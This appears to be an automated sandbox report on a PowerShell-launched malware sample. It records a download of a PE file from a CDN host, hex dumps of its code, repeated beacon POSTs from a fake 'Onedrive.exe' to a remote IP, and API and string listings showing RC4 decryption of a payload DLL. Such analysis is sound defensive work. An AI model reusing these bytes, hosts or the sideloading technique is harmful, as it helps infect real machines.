1	192.168.2.5	49707	89.35.237.170	443	5324	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:36:17 UTC	145	OUT	GET /sppc.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: bangla.b-cdn.net
2024-12-19 12:36:18 UTC	673	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 12:36:18 GMT Content-Type: application/octet-stream Content-Length: 371712 Connection: close Server: BunnyCDN-RI1-892 CDN-PullZone: 3104411 CDN-Uid: 73bf0b00-2886-453c-ad69-38229cfc7e90 CDN-RequestCountryCode: US Cache-Control: max-age=25600000 ETag: "67629392-5ac00" Last-Modified: Wed, 18 Dec 2024 09:19:14 GMT CDN-StorageServer: DE-587 CDN-FileServer: 976 CDN-ProxyVer: 1.06 CDN-RequestPullSuccess: True CDN-RequestPullCode: 200 CDN-CachedAt: 12/19/2024 12:35:14 CDN-EdgeStorageId: 892 CDN-Status: 200 CDN-RequestTime: 0 CDN-RequestId: cbc0db157b13bb6f82d0e22b75b1076e CDN-Cache: HIT Accept-Ranges: bytes
2024-12-19 12:36:18 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3e 87 d9 e0 7a e6 b7 b3 7a e6 b7 b3 7a e6 b7 b3 31 9e b4 b2 7d e6 b7 b3 31 9e b2 b2 f6 e6 b7 b3 31 9e b3 b2 70 e6 b7 b3 6a 62 b4 b2 73 e6 b7 b3 6a 62 b3 b2 74 e6 b7 b3 6a 62 b2 b2 5a e6 b7 b3 31 9e b6 b2 79 e6 b7 b3 7a e6 b6 b3 12 e6 b7 b3 31 63 b3 b2 79 e6 b7 b3 31 63 b7 b2 7b e6 b7 b3 31 63 48 b3 7b e6 b7 b3 31 63 b5 b2 7b e6 b7 b3 52 69 63 68 7a e6 b7 b3 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$>zzz1}11pjbsjbtjbZ1yz1cy1c{1cH{1c{Richz
2024-12-19 12:36:18 UTC	16384	IN	Data Raw: 4c 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 56 57 48 81 ec e8 00 00 00 48 8b 05 1c 34 05 00 48 33 c4 48 89 84 24 d0 00 00 00 48 8d 44 24 30 48 8d 0d 45 e6 03 00 48 8b f8 48 8b f1 b9 98 00 00 00 f3 a4 b8 08 00 00 00 48 6b c0 00 48 8d 0d 78 2a 00 00 48 89 4c 04 50 b8 08 00 00 00 48 6b c0 01 48 8b 8c 24 18 01 00 00 48 89 4c 04 50 b8 08 00 00 00 48 6b c0 02 48 8b 8c 24 20 01 00 00 48 89 4c 04 50 48 63 84 24 30 01 00 00 b9 08 00 00 00 48 6b c9 03 48 89 44 0c 50 b8 08 00 00 00 48 6b c0 04 48 8b 8c 24 10 01 00 00 48 89 4c 04 50 b8 08 00 00 00 48 6b c0 05 48 8b 8c 24 28 01 00 00 48 89 4c 04 50 b8 08 00 00 00 48 6b c0 06 48 8b 8c 24 08 01 00 00 48 89 4c 04 50 0f b6 84 24 50 01 00 00 b9 08 00 00 00 48 6b c9 07 48 89 44 0c 50 b8 08 00 00 00 48 6b c0 Data Ascii: LL$ LD$HT$HL$VWHH4H3H$HD$0HEHHHkHx*HLPHkH$HLPHkH$ HLPHc$0HkHDPHkH$HLPHkH$(HLPHkH$HLP$PHkHDPHk
2024-12-19 12:36:18 UTC	16384	IN	Data Raw: 44 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 48 48 8d 44 24 28 48 89 44 24 20 4c 8b 44 24 60 48 8b 54 24 58 48 8b 4c 24 20 e8 5a 25 00 00 41 b1 01 44 8b 44 24 68 48 8b d0 48 8b 4c 24 50 e8 05 2a 00 00 48 83 c4 48 c3 4c 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 81 ec 98 00 00 00 48 c7 44 24 60 fe ff ff ff 48 83 bc 24 a8 00 00 00 00 74 0a c7 44 24 30 01 00 00 00 eb 08 c7 44 24 30 00 00 00 00 8b 44 24 30 89 44 24 34 83 7c 24 34 00 75 3a 48 8d 05 d1 b0 03 00 48 89 44 24 28 48 8d 05 15 a7 03 00 48 89 44 24 20 45 33 c9 41 b8 22 00 00 00 48 8d 15 d8 b0 03 00 b9 02 00 00 00 e8 ee 62 01 00 83 f8 01 75 03 cc 33 c0 83 7c 24 34 00 75 61 48 8b 8c 24 b8 00 00 00 e8 72 7a 00 00 48 89 44 24 40 ba 16 00 00 00 48 8b 4c 24 40 e8 be Data Ascii: DL$ LD$HT$HL$HHHD$(HD$ LD$`HT$XHL$ Z%ADD$hHHL$P*HHLL$ LD$HT$HL$HHD$`H$tD$0D$0D$0D$4\|$4u:HHD$(HHD$ E3A"Hbu3\|$4uaH$rzHD$@HL$@
2024-12-19 12:36:18 UTC	16384	IN	Data Raw: 24 38 48 8b 8c 24 90 00 00 00 e8 91 e2 ff ff 88 44 24 33 eb 16 48 8d 54 24 38 48 8b 8c 24 90 00 00 00 e8 a9 e2 ff ff 88 44 24 33 0f b6 44 24 33 88 44 24 30 e9 23 01 00 00 ba 10 00 00 00 48 8b 8c 24 90 00 00 00 e8 a5 3b 00 00 0f b6 c0 85 c0 74 18 48 8d 54 24 38 48 8b 8c 24 90 00 00 00 e8 9c e2 ff ff 88 44 24 34 eb 16 48 8d 54 24 38 48 8b 8c 24 90 00 00 00 e8 84 e2 ff ff 88 44 24 34 0f b6 44 24 34 88 44 24 30 e9 ce 00 00 00 33 c0 85 c0 74 0a c7 44 24 40 01 00 00 00 eb 08 c7 44 24 40 00 00 00 00 8b 44 24 40 89 44 24 44 83 7c 24 44 00 75 3a 48 8d 05 54 7c 03 00 48 89 44 24 28 48 8d 05 00 67 03 00 48 89 44 24 20 45 33 c9 41 b8 0b 0a 00 00 48 8d 15 f3 72 03 00 b9 02 00 00 00 e8 d9 22 01 00 83 f8 01 75 03 cc 33 c0 83 7c 24 44 00 75 66 48 8b 84 24 90 00 00 00 48 Data Ascii: $8H$D$3HT$8H$D$3D$3D$0#H$;tHT$8H$D$4HT$8H$D$4D$4D$03tD$@D$@D$@D$D\|$Du:HT\|HD$(HgHD$ E3AHr"u3\|$DufH$H
2024-12-19 12:36:18 UTC	16384	IN	Data Raw: 03 cc 33 c0 83 7c 24 38 00 75 63 48 8b 44 24 70 48 8b 48 08 e8 47 fb ff ff 48 89 44 24 50 ba 16 00 00 00 48 8b 4c 24 50 e8 93 0a 00 00 48 8b 44 24 70 48 8b 40 08 48 89 44 24 28 48 c7 44 24 20 00 00 00 00 41 b9 84 06 00 00 4c 8d 05 7f 33 03 00 48 8d 15 38 34 03 00 48 8d 0d 39 33 03 00 e8 cc d1 00 00 b8 ff ff ff ff e9 7f 02 00 00 48 8b 4c 24 70 e8 28 f4 ff ff 0f b6 c0 85 c0 0f 84 62 02 00 00 48 8b 44 24 70 c7 40 48 00 00 00 00 48 8b 44 24 70 c6 40 24 00 48 8b 44 24 70 48 8b 40 10 0f b6 00 88 44 24 31 48 8b 44 24 70 48 8b 40 10 48 ff c0 48 8b 4c 24 70 48 89 41 10 48 8b 44 24 70 0f b6 4c 24 31 88 48 39 0f be 44 24 31 85 c0 0f 84 f1 01 00 00 48 8b 44 24 70 83 78 20 00 0f 8c e2 01 00 00 48 8b 44 24 70 44 0f b6 40 24 48 8b 44 24 70 0f b6 50 39 48 8b 4c 24 70 e8 Data Ascii: 3\|$8ucHD$pHHGHD$PHL$PHD$pH@HD$(HD$ AL3H84H93HL$p(bHD$p@HHD$p@$HD$pH@D$1HD$pH@HHL$pHAHD$pL$1H9D$1HD$px HD$pD@$HD$pP9HL$p
2024-12-19 12:36:18 UTC	16384	IN	Data Raw: 8b 84 24 d0 00 00 00 48 8b 40 40 0f be 00 83 f8 49 74 28 48 8b 84 24 d0 00 00 00 48 8b 40 40 0f be 00 83 f8 6e 74 14 48 8b 84 24 d0 00 00 00 48 8b 40 40 0f be 00 83 f8 4e 75 23 ba 08 00 00 00 48 8b 8c 24 d0 00 00 00 e8 b3 12 00 00 b8 73 00 00 00 48 8b 8c 24 d0 00 00 00 66 89 41 3a 48 8b 84 24 d0 00 00 00 48 8b 48 40 e8 c1 8c 00 00 48 8b 8c 24 d0 00 00 00 89 41 48 b0 01 48 81 c4 c0 00 00 00 5f c3 cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 33 d2 48 8b 4c 24 30 e8 2b 00 00 00 48 83 c4 28 c3 cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 33 d2 48 8b 4c 24 30 e8 7b 01 00 00 48 83 c4 28 c3 cc cc cc cc cc cc 88 54 24 10 48 89 4c 24 08 48 83 ec 68 48 8b 44 24 70 44 8b 40 34 48 8b 44 24 70 0f b6 50 39 48 8b 44 24 70 48 8b 08 e8 24 63 ff ff 0f b6 c0 Data Ascii: $H@@It(H$H@@ntH$H@@Nu#H$sH$fA:H$HH@H$AHH_HL$H(3HL$0+H(HL$H(3HL$0{H(T$HL$HhHD$pD@4HD$pP9HD$pH$c
2024-12-19 12:36:18 UTC	16384	IN	Data Raw: 24 34 48 8b 44 24 28 48 ff c0 48 89 44 24 28 0f b6 44 24 34 88 44 24 21 e9 ba 00 00 00 48 8b 84 24 80 00 00 00 48 8b 00 48 ff c0 48 8b 8c 24 80 00 00 00 48 89 01 48 83 7c 24 70 00 74 1c 48 8b 44 24 70 48 8b 4c 24 28 0f b6 09 88 08 48 8b 44 24 70 48 ff c0 48 89 44 24 70 48 8b 44 24 28 0f b6 00 88 44 24 35 48 8b 44 24 28 48 ff c0 48 89 44 24 28 0f b6 44 24 35 88 44 24 21 0f b6 4c 24 21 e8 9a 04 00 00 0f b6 c0 85 c0 74 4a 48 8b 84 24 80 00 00 00 48 8b 00 48 ff c0 48 8b 8c 24 80 00 00 00 48 89 01 48 83 7c 24 70 00 74 1c 48 8b 44 24 70 48 8b 4c 24 28 0f b6 09 88 08 48 8b 44 24 70 48 ff c0 48 89 44 24 70 48 8b 44 24 28 48 ff c0 48 89 44 24 28 0f be 44 24 21 85 c0 74 25 0f b6 44 24 20 85 c0 0f 85 d8 fe ff ff 0f be 44 24 21 83 f8 20 74 0e 0f be 44 24 21 83 f8 09 Data Ascii: $4HD$(HHD$(D$4D$!H$HHH$HH\|$ptHD$pHL$(HD$pHHD$pHD$(D$5HD$(HHD$(D$5D$!L$!tJH$HHH$HH\|$ptHD$pHL$(HD$pHHD$pHD$(HHD$(D$!t%D$ D$! tD$!
2024-12-19 12:36:18 UTC	16384	IN	Data Raw: 48 89 4c 24 08 48 83 ec 38 33 c9 e8 10 9a 00 00 90 48 8b 4c 24 40 e8 d5 dc ff ff 90 33 c9 e8 8d 9a 00 00 48 8d 05 a6 b2 02 00 48 89 44 24 28 48 8d 05 f2 65 02 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 f6 22 00 00 83 f8 01 75 03 cc 33 c0 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc 89 4c 24 08 48 83 ec 58 c7 44 24 40 37 00 00 00 8b 44 24 60 25 ff ff 00 00 83 e0 c8 85 c0 75 07 c6 44 24 30 01 eb 05 c6 44 24 30 00 0f b6 44 24 30 88 44 24 31 83 7c 24 60 ff 74 13 0f b6 44 24 31 85 c0 75 0a c7 44 24 34 00 00 00 00 eb 08 c7 44 24 34 01 00 00 00 8b 44 24 34 89 44 24 38 83 7c 24 38 00 75 3a 48 8d 05 73 af 02 00 48 89 44 24 28 48 8d 05 ef 66 02 00 48 89 44 24 20 45 33 c9 41 b8 29 05 00 00 48 8d 15 f2 a2 02 00 b9 02 00 00 00 e8 c8 22 00 00 83 f8 01 75 03 cc 33 Data Ascii: HL$H83HL$@3HHD$(HeHD$ E3E333"u3H8L$HXD$@7D$`%uD$0D$0D$0D$1\|$`tD$1uD$4D$4D$4D$8\|$8u:HsHD$(HfHD$ E3A)H"u3
2024-12-19 12:36:19 UTC	16384	IN	Data Raw: 5c ec 00 00 89 44 24 28 8b 44 24 28 39 44 24 20 74 16 ba 10 00 00 00 48 8d 4c 24 30 e8 4f fe ff ff b8 ff ff ff ff eb 27 ba 04 00 00 00 48 8d 4c 24 30 e8 59 fd ff ff 0f b6 c0 85 c0 74 0f ba 02 00 00 00 48 8d 4c 24 30 e8 93 fe ff ff 33 c0 48 83 c4 58 c3 cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 78 33 d2 48 8d 4c 24 30 e8 6b ee fe ff 48 8d 54 24 30 48 8b 8c 24 80 00 00 00 e8 89 fb ff ff 89 44 24 20 48 8d 4c 24 30 e8 ab f0 fe ff 8b 44 24 20 48 83 c4 78 c3 cc cc 48 83 ec 28 b1 01 e8 05 fc ff ff 48 83 c4 28 c3 89 54 24 10 48 89 4c 24 08 48 83 ec 38 48 8b 4c 24 40 e8 a9 fa fe ff 23 44 24 48 85 c0 74 0a c7 44 24 20 01 00 00 00 eb 08 c7 44 24 20 00 00 00 00 0f b6 44 24 20 48 83 c4 38 c3 cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 ba 40 00 00 00 48 Data Ascii: \D$(D$(9D$ tHL$0O'HL$0YtHL$03HXHL$Hx3HL$0kHT$0H$D$ HL$0D$ HxH(H(T$HL$H8HL$@#D$HtD$ D$ D$ H8HL$H(@H
2024-12-19 12:36:19 UTC	16384	IN	Data Raw: c8 00 00 00 e8 07 f1 00 00 89 44 24 4c 48 83 bc 24 c0 00 00 00 00 74 0e 48 8b 84 24 c0 00 00 00 8b 4c 24 4c 89 08 83 7c 24 4c 04 7f 09 33 c0 e9 8d 03 00 00 eb 29 48 8b 8c 24 e0 00 00 00 e8 1d bb fe ff 48 89 84 24 80 00 00 00 33 d2 48 8b 8c 24 80 00 00 00 e8 e6 fd ff ff e9 62 03 00 00 48 8b 44 24 68 48 8b 00 b9 08 00 00 00 48 6b c9 02 48 83 bc 08 28 01 00 00 00 0f 85 82 01 00 00 0f b7 84 24 d8 00 00 00 3d ff 00 00 00 7e 59 48 83 bc 24 c8 00 00 00 00 74 22 48 83 bc 24 d0 00 00 00 00 76 17 4c 8b 84 24 d0 00 00 00 33 d2 48 8b 8c 24 c8 00 00 00 e8 45 b5 01 00 48 8b 8c 24 e0 00 00 00 e8 98 ba fe ff 48 89 84 24 88 00 00 00 ba 2a 00 00 00 48 8b 8c 24 88 00 00 00 e8 de c9 fe ff e9 da 02 00 00 48 83 bc 24 c8 00 00 00 00 0f 84 e6 00 00 00 48 83 bc 24 d0 00 00 00 00 Data Ascii: D$LH$tH$L$L\|$L3)H$H$3H$bHD$hHHkH($=~YH$t"H$vL$3H$EH$H$*H$H$H$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49709	47.84.196.148	443	5036	C:\Users\user\AppData\Local\Temp\Onedrive.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:36:21 UTC	179	OUT	POST /reports HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: / User-Agent: Mozilla/5.0 Content-Length: 282 Host: 47.84.196.148
2024-12-19 12:36:21 UTC	282	OUT	Data Raw: 00 00 01 16 de ad be ef 7d de 40 04 00 00 00 63 00 00 00 00 26 16 ca 0a 18 0c f0 10 94 ea 7e 5e 92 66 ac 76 50 e4 9c da 62 5c 68 ca e4 2e 70 d8 fa 8c 36 62 36 7c 2e 12 8a c0 24 96 96 a4 7e 66 4e 26 2c 1c 78 7d 79 41 c2 62 58 ce 50 8a 15 43 4f 7c 6b 10 3c 10 ea 8b b6 be 3f 8c 83 d0 4d 09 2c 55 f4 e5 6f c7 d7 35 25 fd 49 57 f6 f0 87 70 7e 72 89 d1 ea 1a 93 f3 58 4d fa f7 e8 85 ff df be 75 82 2a b0 43 8d 1f ba fb b5 1e a4 01 23 94 71 00 4a f1 fe f5 48 40 5a 38 9c 0f 56 da a3 a0 0a 09 1c 66 a6 57 59 02 bf 20 d7 3a fc 34 19 c4 43 74 9b 47 9a 3d c0 06 c3 37 6c d2 5b 48 81 5e 00 39 0b eb bc 3b ea 38 77 2e 28 81 20 cc 5d e1 d7 46 e9 b9 57 9e 56 76 96 05 1b b2 3c f9 2d 6c 2c d0 b8 59 1e d3 e3 85 33 96 a0 49 95 37 ba f1 97 b1 3d 44 5f d4 d2 4a 5d c5 33 84 14 ee bb Data Ascii: }@c&~^fvPb\h.p6b6\|.$~fN&,x}yAbXPCO\|k<?M,Uo5%IWp~rXMu*C#qJH@Z8VfWY :4CtG=7l[H^9;8w.( ]FWVv<-l,Y3I7=D_J]3
2024-12-19 12:36:22 UTC	166	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 12:36:22 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 4 Content-Type: application/octet-stream Connection: close
2024-12-19 12:36:22 UTC	4	IN	Data Raw: 01 e3 e7 38 Data Ascii: 8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49785	47.84.196.148	443	5036	C:\Users\user\AppData\Local\Temp\Onedrive.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:36:53 UTC	178	OUT	POST /reports HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: / User-Agent: Mozilla/5.0 Content-Length: 20 Host: 47.84.196.148
2024-12-19 12:36:53 UTC	20	OUT	Data Raw: 00 00 00 10 de ad be ef 7d de 40 04 00 00 00 01 00 00 00 00 Data Ascii: }@
2024-12-19 12:36:54 UTC	167	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 12:36:54 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 12 Content-Type: application/octet-stream Connection: close
2024-12-19 12:36:54 UTC	12	IN	Data Raw: 0a 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49879	47.84.196.148	443	5036	C:\Users\user\AppData\Local\Temp\Onedrive.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:37:33 UTC	178	OUT	POST /reports HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: / User-Agent: Mozilla/5.0 Content-Length: 20 Host: 47.84.196.148
2024-12-19 12:37:33 UTC	20	OUT	Data Raw: 00 00 00 10 de ad be ef 7d de 40 04 00 00 00 01 00 00 00 00 Data Ascii: }@
2024-12-19 12:37:34 UTC	167	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 12:37:33 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 12 Content-Type: application/octet-stream Connection: close
2024-12-19 12:37:34 UTC	12	IN	Data Raw: 0a 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49965	47.84.196.148	443	5036	C:\Users\user\AppData\Local\Temp\Onedrive.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:38:11 UTC	178	OUT	POST /reports HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: / User-Agent: Mozilla/5.0 Content-Length: 20 Host: 47.84.196.148
2024-12-19 12:38:11 UTC	20	OUT	Data Raw: 00 00 00 10 de ad be ef 7d de 40 04 00 00 00 01 00 00 00 00 Data Ascii: }@
2024-12-19 12:38:12 UTC	167	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 12:38:12 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 12 Content-Type: application/octet-stream Connection: close
2024-12-19 12:38:12 UTC	12	IN	Data Raw: 0a 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49983	47.84.196.148	443	5036	C:\Users\user\AppData\Local\Temp\Onedrive.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:38:43 UTC	178	OUT	POST /reports HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: / User-Agent: Mozilla/5.0 Content-Length: 20 Host: 47.84.196.148
2024-12-19 12:38:43 UTC	20	OUT	Data Raw: 00 00 00 10 de ad be ef 7d de 40 04 00 00 00 01 00 00 00 00 Data Ascii: }@
2024-12-19 12:38:44 UTC	167	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 12:38:44 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 12 Content-Type: application/octet-stream Connection: close
2024-12-19 12:38:44 UTC	12	IN	Data Raw: 0a 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49984	47.84.196.148	443	5036	C:\Users\user\AppData\Local\Temp\Onedrive.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:39:22 UTC	178	OUT	POST /reports HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: / User-Agent: Mozilla/5.0 Content-Length: 20 Host: 47.84.196.148
2024-12-19 12:39:22 UTC	20	OUT	Data Raw: 00 00 00 10 de ad be ef 7d de 40 04 00 00 00 01 00 00 00 00 Data Ascii: }@
2024-12-19 12:39:23 UTC	167	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 12:39:23 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 12 Content-Type: application/octet-stream Connection: close
2024-12-19 12:39:23 UTC	12	IN	Data Raw: 0a 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49985	47.84.196.148	443	5036	C:\Users\user\AppData\Local\Temp\Onedrive.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:39:52 UTC	178	OUT	POST /reports HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: / User-Agent: Mozilla/5.0 Content-Length: 20 Host: 47.84.196.148
2024-12-19 12:39:52 UTC	20	OUT	Data Raw: 00 00 00 10 de ad be ef 7d de 40 04 00 00 00 01 00 00 00 00 Data Ascii: }@
2024-12-19 12:39:53 UTC	167	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 12:39:53 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 12 Content-Type: application/octet-stream Connection: close
2024-12-19 12:39:53 UTC	12	IN	Data Raw: 0a 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

Target ID:	0
Start time:	07:36:06
Start date:	19/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\g1.ps1"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:36:06
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:36:18
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Onedrive.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\Onedrive.exe"
Imagebase:	0x7ff6104f0000
File size:	110'536 bytes
MD5 hash:	32C31F06E0B68F349F68AFDD08E45F3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Function 00007FF848E937B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2268991849.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dd856ec6629a9ad3253283359d6c2a881ec7a1311ff8ffeb1e483423fcff176
Instruction ID: 4f6d13a1e641f644b83a0d5b89e1e045fb9419d8f6b4001dfd04de57bab85d14
Opcode Fuzzy Hash: 3dd856ec6629a9ad3253283359d6c2a881ec7a1311ff8ffeb1e483423fcff176
Instruction Fuzzy Hash: FF01677111CB0D4FDB44EF0CE451AA6B7E0FB95364F10056DE58AC3661D736E882CB45

Analysis Process: Onedrive.exePID: 5036, Parent PID: 5324COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	47.3%
Total number of Nodes:	188
Total number of Limit Nodes:	8

Executed Functions

Function 00007FF8A0301010 Relevance: 63.2, APIs: 21, Strings: 15, Instructions: 226
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 00007FF8A030104B
GetFileSize.KERNEL32 ref: 00007FF8A0301073
VirtualAlloc.KERNELBASE ref: 00007FF8A0301094
ReadFile.KERNELBASE ref: 00007FF8A03010B8
CloseHandle.KERNELBASE ref: 00007FF8A03010D5
LoadLibraryW.KERNEL32 ref: 00007FF8A03010E2
GetProcAddress.KERNEL32 ref: 00007FF8A03010F2
VirtualFree.KERNEL32 ref: 00007FF8A030110B
GetModuleHandleW.KERNEL32 ref: 00007FF8A03011B8
GetProcAddress.KERNEL32 ref: 00007FF8A03011C8
NtQuerySecurityObject.NTDLL ref: 00007FF8A030123D
VirtualFree.KERNEL32 ref: 00007FF8A03013E8
CloseHandle.KERNEL32 ref: 00007FF8A03013F1

Strings

SystemFunction033, xrefs: 00007FF8A03010EB
sztw, xrefs: 00007FF8A0301161
NtQuerySecurityObject, xrefs: 00007FF8A03011C1, 00007FF8A030125D, 00007FF8A030132A
jnui, xrefs: 00007FF8A0301145
[!] 0x%0.8X Failed With Error: 0x%0.8X , xrefs: 00007FF8A03013A7
vhps, xrefs: 00007FF8A030111A
NTDLL.DLL, xrefs: 00007FF8A03011A5, 00007FF8A030124D, 00007FF8A030131A
onedrive.dll, xrefs: 00007FF8A0301024
vnzj, xrefs: 00007FF8A030114C
zhww, xrefs: 00007FF8A0301168
xcha, xrefs: 00007FF8A030116F
advapi32.dll, xrefs: 00007FF8A03010DB
oyty, xrefs: 00007FF8A030115A
ahrm, xrefs: 00007FF8A0301153
@, xrefs: 00007FF8A030127A

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: FileHandleVirtual$AddressCloseFreeProc$AllocCreateLibraryLoadModuleObjectQueryReadSecuritySize
String ID: @$NTDLL.DLL$NtQuerySecurityObject$SystemFunction033$[!] 0x%0.8X Failed With Error: 0x%0.8X $advapi32.dll$ahrm$jnui$onedrive.dll$oyty$sztw$vhps$vnzj$xcha$zhww
API String ID: 871153514-2486118554
Opcode ID: 0ac7f9eabe81cef257cbea7df8756715c20c55e09b58fdf4186fe0a0c9f03c50
Instruction ID: 3130453d506ab6a47489971c0b760aeeff560a78905c87becc75bbffafb05fdd
Opcode Fuzzy Hash: 0ac7f9eabe81cef257cbea7df8756715c20c55e09b58fdf4186fe0a0c9f03c50
Instruction Fuzzy Hash: 21B18D36A0BF43A5E7208F65E85076A37A4FB457D4F504239EA9D2ABA4DF3CE105C700

Function 00007FF6104F1384 Relevance: 31.8, APIs: 21, Instructions: 308
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6104F9CAC: EventRegister.ADVAPI32(?,?,?,?,00007FF6104F13DD), ref: 00007FF6104F9CBE

EventRegister.ADVAPI32 ref: 00007FF6104F1432
EventSetInformation.ADVAPI32 ref: 00007FF6104F145B
EventActivityIdControl.ADVAPI32 ref: 00007FF6104F14A6
SLOpen.SLC ref: 00007FF6104F1556
SLpIsCurrentInstalledProductKeyDefaultKey.SPPC ref: 00007FF6104F157F
